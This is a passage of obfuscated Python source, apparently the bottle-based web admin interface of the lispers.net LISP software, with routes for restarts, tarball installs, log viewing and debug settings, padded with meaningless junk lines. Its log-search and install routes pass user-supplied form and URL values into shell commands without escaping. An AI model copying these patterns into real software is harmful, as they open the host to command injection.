if ( OooOO [ - 1 ] == "requiretty" and OooOO [ 0 ] == "Defaults" ) :
i1I1ii = "Need to remove 'requiretty' from /etc/sudoers"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
lisp . lprint ( lisp . bold ( "LISP subsystem restart request received" , False ) )
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
oOoO0o00OO0 = I1iOOOO ( )
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
OoOOo000o0 = "sleep 1; sudo ./RESTART-LISP {}" . format ( oOoO0o00OO0 )
thread . start_new_thread ( os . system , ( OoOOo000o0 , ) )
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
i1I1ii = lisp . lisp_print_sans ( "Restarting LISP subsystem ..." )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
@ bottle . route ( '/lisp/restart/verify' )
def OO0O0o0o0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 31 - 31: Ii1I
if 44 - 44: OoOoOO00 - iIii1I11I1II1 - Oo0Ooo
i1I1ii = "<br>Are you sure you want to restart the LISP subsystem?"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 80 - 80: iIii1I11I1II1 * I1Ii111 % I11i % Oo0Ooo
I1ii = lisp . lisp_button ( "yes" , "/lisp/restart" )
O00O0O = lisp . lisp_button ( "cancel" , "/lisp" )
i1I1ii += I1ii + O00O0O + "<br>"
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 95 - 95: iIii1I11I1II1 - I1ii11iIi11i . I1Ii111 - I1IiiI
if 75 - 75: OoO0O00 + o0oOOo0O0Ooo - i1IIi . OoooooooOO * Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
@ bottle . route ( '/lisp/install' , method = "post" )
def iiIII1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 100 - 100: Oo0Ooo % Ii1I / I11i
if 30 - 30: Oo0Ooo - OOooOOo - iII111i
OOO = bottle . request . forms . get ( "image_url" )
if ( OOO . find ( "lispers.net" ) == - 1 or OOO . find ( ".tgz" ) == - 1 ) :
I11IIiIiI = "Invalid install request for file {}" . format ( OOO )
lisp . lprint ( lisp . bold ( I11IIiIiI , False ) )
i1I1ii = lisp . lisp_print_sans ( "Invalid lispers.net tarball file name" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if ( lisp . lisp_is_ubuntu ( ) ) :
OoOOo000o0 = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null" . format ( OOO )
else :
OoOOo000o0 = "python lisp-get-bits.pyo {} force >& /dev/null" . format ( OOO )
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
IIiiI = os . system ( OoOOo000o0 )
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
OoooO0o = OOO . split ( "/" ) [ - 1 ]
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if ( os . path . exists ( OoooO0o ) ) :
IIi1II = OOO . split ( "release-" ) [ 1 ]
IIi1II = IIi1II . split ( ".tgz" ) [ 0 ]
if 2 - 2: II111iiii - OoO0O00 . IiII * iII111i / oO0o
i1I1ii = "Install completed for release {}" . format ( IIi1II )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 80 - 80: OOooOOo / I11i / OoOoOO00 + i1IIi - Oo0Ooo
i1I1ii += "<br><br>" + lisp . lisp_button ( "restart LISP subsystem" ,
"/lisp/restart/verify" ) + "<br>"
else :
I11IIiIiI = lisp . lisp_print_cour ( OOO )
i1I1ii = "Install failed for file {}" . format ( I11IIiIiI )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 11 - 11: o0oOOo0O0Ooo * OoO0O00
if 15 - 15: OoOoOO00
I11IIiIiI = "Install request for file {} {}" . format ( OOO ,
"succeeded" if ( IIiiI == 0 ) else "failed" )
lisp . lprint ( lisp . bold ( I11IIiIiI , False ) )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 62 - 62: Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
@ bottle . route ( '/lisp/install/image' )
def ooOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 37 - 37: Ii1I % OoO0O00
if 79 - 79: I1ii11iIi11i + I1IiiI / I1IiiI
I11IIiIiI = lisp . lisp_print_sans ( "<br>Enter lispers.net tarball URL:" )
i1I1ii = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>''' . format ( I11IIiIiI )
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
@ bottle . route ( '/lisp/log/flows' )
def oo0OoOooo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 95 - 95: IiII * I1ii11iIi11i % ooOoO0o % Ii1I - Ii1I
if 97 - 97: I1ii11iIi11i + iIii1I11I1II1 . O0
os . system ( "touch ./log-flows" )
if 64 - 64: i1IIi % ooOoO0o / i11iIiiIii - i1IIi % OOooOOo . iII111i
i1I1ii = lisp . lisp_print_sans ( "Flow data appended to file " )
II1i111 = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
i1I1ii += lisp . lisp_print_cour ( II1i111 )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
@ bottle . route ( '/lisp/search/log/<name>/<num>/<keyword>' )
def iIIi ( name = "" , num = "" , keyword = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
OOoOO0o0o0 = "tail -n {} logs/{}.log | egrep -B10 -A10 {}" . format ( num , name ,
keyword )
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if ( i1I1ii ) :
iI1iii = i1I1ii . count ( keyword )
i1I1ii = lisp . convert_font ( i1I1ii )
i1I1ii = i1I1ii . replace ( "--\n--\n" , "--\n" )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = i1I1ii . replace ( "--<br>" , "<hr>" )
i1I1ii = "Found <b>{}</b> occurences<hr>" . format ( iI1iii ) + i1I1ii
else :
i1I1ii = "Keyword {} not found" . format ( keyword )
if 87 - 87: I1ii11iIi11i / OoooooooOO - Oo0Ooo % OoOoOO00 % IiII % Oo0Ooo
if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
if 45 - 45: I1ii11iIi11i + OoO0O00 * i11iIiiIii / OOooOOo % I11i * O0
i1o0oooO = "<font color='blue'><b>{}</b>" . format ( keyword )
i1I1ii = i1I1ii . replace ( keyword , i1o0oooO )
i1I1ii = i1I1ii . replace ( keyword , keyword + "</font>" )
if 89 - 89: II111iiii / oO0o
i1I1ii = lisp . lisp_print_cour ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
@ bottle . post ( '/lisp/search/log/<name>/<num>' )
def oo0oOO ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
I1I1 = bottle . request . forms . get ( "keyword" )
return ( iIIi ( name , num , I1I1 ) )
if 4 - 4: o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
@ bottle . route ( '/lisp/show/log/<name>/<num>' )
def Oo0 ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 79 - 79: OoO0O00 % OOooOOo / iIii1I11I1II1 + OoOoOO00 * OoO0O00
if 30 - 30: OoooooooOO / I11i + iII111i / I1ii11iIi11i * O0
if 16 - 16: Oo0Ooo / i11iIiiIii
if 64 - 64: i11iIiiIii / Ii1I * i1IIi
if 73 - 73: Oo0Ooo - OoOoOO00 - oO0o - I1IiiI
if ( num == "" ) : num = 100
if 65 - 65: o0oOOo0O0Ooo
I1ii1II1iII = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
''' . format ( name , num )
if 8 - 8: OoOoOO00 / O0 * O0 % I1Ii111 - Oo0Ooo + I11i
if ( os . path . exists ( "logs/{}.log" . format ( name ) ) ) :
i1I1ii = commands . getoutput ( "tail -n {} logs/{}.log" . format ( num , name ) )
i1I1ii = lisp . convert_font ( i1I1ii )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = I1ii1II1iII + lisp . lisp_print_cour ( i1I1ii )
else :
oo = lisp . lisp_print_sans ( "File" )
Ii1IiIiIi1IiI = lisp . lisp_print_cour ( "logs/{}.log" . format ( name ) )
i1iiIIi1I = lisp . lisp_print_sans ( "does not exist" )
i1I1ii = "{} {} {}" . format ( oo , Ii1IiIiIi1IiI , i1iiIIi1I )
if 36 - 36: I1IiiI * Oo0Ooo
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 77 - 77: oO0o % i1IIi - Ii1I
if 93 - 93: OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
@ bottle . route ( '/lisp/debug/<name>' )
def ooOoO ( name = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if ( name == "disable%all" ) :
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( "lisp debug" )
if ( IIIi1i1I [ 0 ] . has_key ( "lisp debug" ) ) :
OoO0OOOOo0O = [ ]
for I1i1I in IIIi1i1I [ 0 ] [ "lisp debug" ] :
iii1I1Iii = I1i1I . keys ( ) [ 0 ]
OoO0OOOOo0O . append ( { iii1I1Iii : "no" } )
if 82 - 82: Ii1I + IiII
OoO0OOOOo0O = { "lisp debug" : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 12 - 12: I1Ii111
if 93 - 93: i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / o0oOOo0O0Ooo / II111iiii
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( "lisp xtr-parameters" )
if ( IIIi1i1I [ 0 ] . has_key ( "lisp xtr-parameters" ) ) :
OoO0OOOOo0O = [ ]
for I1i1I in IIIi1i1I [ 0 ] [ "lisp xtr-parameters" ] :
iii1I1Iii = I1i1I . keys ( ) [ 0 ]
if ( iii1I1Iii in [ "data-plane-logging" , "flow-logging" ] ) :
OoO0OOOOo0O . append ( { iii1I1Iii : "no" } )
else :
OoO0OOOOo0O . append ( { iii1I1Iii : I1i1I [ iii1I1Iii ] } )
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
OoO0OOOOo0O = { "lisp xtr-parameters" : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 1 - 1: IiII / IiII - i11iIiiIii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
return ( lispconfig . lisp_landing_page ( ) )
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
name = name . split ( "%" )
Ii11iI1ii1111 = name [ 0 ]
Iii111II = name [ 1 ]
if 42 - 42: I1Ii111 + I1Ii111 * II111iiii
o0Oo = [ "data-plane-logging" , "flow-logging" ]
if 57 - 57: OOooOOo / Oo0Ooo
oO0O0Ooo = "lisp xtr-parameters" if ( Ii11iI1ii1111 in o0Oo ) else "lisp debug"
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( oO0O0Ooo )
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if ( IIIi1i1I [ 0 ] . has_key ( oO0O0Ooo ) ) :
OoO0OOOOo0O = { }
for I1i1I in IIIi1i1I [ 0 ] [ oO0O0Ooo ] :
OoO0OOOOo0O [ I1i1I . keys ( ) [ 0 ] ] = I1i1I . values ( ) [ 0 ]
if ( OoO0OOOOo0O . has_key ( Ii11iI1ii1111 ) ) : OoO0OOOOo0O [ Ii11iI1ii1111 ] = Iii111II
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
OoO0OOOOo0O = { oO0O0Ooo : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
return ( lispconfig . lisp_landing_page ( ) )
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
@ bottle . route ( '/lisp/clear/<name>' )
@ bottle . route ( '/lisp/clear/etr/<etr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/itr/<itr_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>' )
def ooooOoO0O ( name = "" , itr_name = '' , rtr_name = "" , etr_name = "" ,
stats_name = "" ) :
if 1 - 1: I1ii11iIi11i / OoO0O00 + oO0o . o0oOOo0O0Ooo / I1ii11iIi11i - iII111i
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 5 - 5: OOooOOo
if 4 - 4: iII111i % I1Ii111 / OoO0O00 . OOooOOo / OOooOOo - I1ii11iIi11i
if 79 - 79: I1ii11iIi11i + I1Ii111
if 10 - 10: Oo0Ooo + O0
if 43 - 43: iIii1I11I1II1 / II111iiii % o0oOOo0O0Ooo - OOooOOo
if ( lispconfig . lisp_is_user_superuser ( None ) == False ) :
i1I1ii = lisp . lisp_print_sans ( "Not authorized" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 62 - 62: I11i
if 63 - 63: OOooOOo + ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
Oo0O00Oo0o0 = "clear"
if ( name == "referral" ) :
OOoO00ooO = "lisp-mr"
I1IIIIiii1i = "Referral"
elif ( itr_name == "map-cache" ) :
OOoO00ooO = "lisp-itr"
I1IIIIiii1i = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif ( rtr_name == "map-cache" ) :
OOoO00ooO = "lisp-rtr"
I1IIIIiii1i = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif ( etr_name == "stats" ) :
OOoO00ooO = "lisp-etr"
I1IIIIiii1i = ( "ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>" ) . format ( stats_name )
if 51 - 51: OOooOOo . I1IiiI
Oo0O00Oo0o0 += "%" + stats_name
elif ( rtr_name == "stats" ) :
OOoO00ooO = "lisp-rtr"
I1IIIIiii1i = ( "RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>" ) . format ( stats_name )
if 73 - 73: OoooooooOO . I1IiiI / I1Ii111 % Ii1I
Oo0O00Oo0o0 += "%" + stats_name
else :
i1I1ii = lisp . lisp_print_sans ( "Invalid command" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 65 - 65: IiII - I1IiiI - Ii1I
if 42 - 42: II111iiii * I1IiiI % i1IIi - Ii1I % IiII
if 36 - 36: i11iIiiIii / oO0o * I1ii11iIi11i * I1ii11iIi11i + Ii1I * I11i
if 32 - 32: OoO0O00
if 50 - 50: ooOoO0o + i1IIi
Oo0O00Oo0o0 = lisp . lisp_command_ipc ( Oo0O00Oo0o0 , "lisp-core" )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , OOoO00ooO )
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
oo0ooooO = commands . getoutput ( "egrep 'lisp map-cache' ./lisp.config" )
if ( oo0ooooO != "" ) :
os . system ( "touch ./lisp.config" )
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
i1I1ii = lisp . lisp_print_sans ( "{} cleared" . format ( I1IIIIiii1i ) )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
@ bottle . route ( '/lisp/show/map-server' )
def iIii11iI1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 42 - 42: ooOoO0o - I1IiiI + I1ii11iIi11i % Ii1I
if 44 - 44: i1IIi - O0 - I1ii11iIi11i * I1ii11iIi11i + OoOoOO00
return ( lispconfig . lisp_process_show_command ( Oo ,
"show map-server" ) )
if 56 - 56: ooOoO0o / iIii1I11I1II1 . Ii1I % OoOoOO00 + OOooOOo
if 10 - 10: I1Ii111 * i11iIiiIii - iIii1I11I1II1 . Oo0Ooo - I1ii11iIi11i
if 20 - 20: I1ii11iIi11i / I1IiiI * OoO0O00 * I1IiiI * O0
if 1 - 1: iIii1I11I1II1 + Oo0Ooo / O0 - iII111i % IiII + IiII
if 24 - 24: I1IiiI + Oo0Ooo + OOooOOo - OoooooooOO + Oo0Ooo
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
@ bottle . route ( '/lisp/show/database' )
def OOoOO0o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
return ( lispconfig . lisp_process_show_command ( Oo ,
"show database-mapping" ) )
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/itr/map-cache' )
def oo0iIiI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 81 - 81: OoOoOO00 % Ii1I
return ( lispconfig . lisp_process_show_command ( Oo ,
"show itr-map-cache" ) )
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
@ bottle . route ( '/lisp/show/itr/rloc-probing' )
def ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 94 - 94: ooOoO0o * I11i - IiII . iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo ,
"show itr-rloc-probing" ) )
if 66 - 66: ooOoO0o - OOooOOo * OoOoOO00 / oO0o * II111iiii * OoO0O00
if 91 - 91: OoooooooOO / Ii1I . I1IiiI + ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if 11 - 11: I1ii11iIi11i
if 26 - 26: iIii1I11I1II1 * I1Ii111 - OOooOOo
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
@ bottle . post ( '/lisp/show/itr/map-cache/lookup' )
def o0OO0O0OO0oO0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 31 - 31: OoO0O00 * i11iIiiIii * Ii1I . i11iIiiIii
if 12 - 12: OoOoOO00 % IiII % I1ii11iIi11i . i11iIiiIii * iIii1I11I1II1
OOoOO0o0o0 = "show itr-map-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo ,
OOoOO0o0o0 ) )
if 66 - 66: i11iIiiIii * iIii1I11I1II1 % OoooooooOO
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if 78 - 78: OoOoOO00
if 1 - 1: OOooOOo . IiII
@ bottle . route ( '/lisp/show/rtr/map-cache' )
@ bottle . route ( '/lisp/show/rtr/map-cache/<dns>' )
def I1iIII1IiiI ( dns = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
if ( dns == "dns" ) :
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-map-cache-dns" ) )
else :
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-map-cache" ) )
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
@ bottle . route ( '/lisp/show/rtr/rloc-probing' )
def i1I1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 17 - 17: O0 * OoOoOO00 * I1ii11iIi11i * II111iiii * I11i % i1IIi
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-rloc-probing" ) )
if 33 - 33: I1ii11iIi11i * I1ii11iIi11i . ooOoO0o . i11iIiiIii
if 48 - 48: o0oOOo0O0Ooo . Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
@ bottle . post ( '/lisp/show/rtr/map-cache/lookup' )
def Oo0oOo0ooOOOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 71 - 71: II111iiii - Ii1I - iII111i * O0 * IiII
if 46 - 46: IiII
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
